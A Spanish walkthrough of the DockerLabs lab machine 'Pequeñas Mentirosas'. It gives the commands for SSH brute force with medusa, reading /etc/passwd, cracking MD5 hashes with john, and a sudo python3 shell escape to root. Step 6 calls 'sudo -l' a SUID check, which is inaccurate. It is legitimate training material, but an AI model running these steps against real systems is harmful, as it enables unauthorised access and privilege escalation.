![]() |
|
| Máquina: Pequeñas Mentirosas | |
| SO: Linux | |
| Nivel: Facil | |
| DockerLabs |
1. Escaneamos los puertos, pillamos dos puertos que corren los servicios de ssh y apache.
sudo nmap -p- -open -T5 --min-rate=5000 -sS -sCV -n -Pn 172.17.0.2

2. En la pagina web nos da una pista, pero fuzzeando de directorios no encontramos ninguno, asi que hacemos fuerza bruta al ssh.
http://172.17.0.2
medusa -h 172.17.0.2 -u a -P wordlists -M ssh -n 22 | grep SUCCESS

3. Nos conectamos por ssh, una vez dentro vamos a revisar la ruta srv/ftp que es donde se almacenan los archivos en el servidor, tenemos dos ficheros con hashes de usuarios existentes en el sistema.
sshpass -p 'secret' ssh a@172.17.0.2
cd /srv/ftp
ls
grep bash /etc/passwd

4. Vemos que estos hashes tienen la misma longitud, para identificar el tipo de hash podemos usar la herramineta hash-identifier o la web hashes
cat hash_a.txt
cat hash_spencer.txt
hash-identifier 890b787e76e086d3d76b3a5e9d6a7778
hash-identifier 7c6a180b36896a0a8c02787eeafb0e4c

5. Sabiendo que son md5 podemos usar john o hashcat para crackearlo, primero guardamos nuestras hashes en un fichero luego procedemos a crackearlo, encuentra una contraseña que es igual para ambos hashes.
nano hashes.txt
john --format=raw-md5 --wordlists=/usr/share/wordlists/rockyou.txt hashes.txt

6. Con esto migramos al usuario spencer y revisamos binarios SUID, tenemos el binario python3.
su spencer
sudo -l

7. Escalamos privilegios a root aprovechando el binario python3. Recurso gtfobins.
sudo python3 -c 'import os; os.system("/bin/sh")'

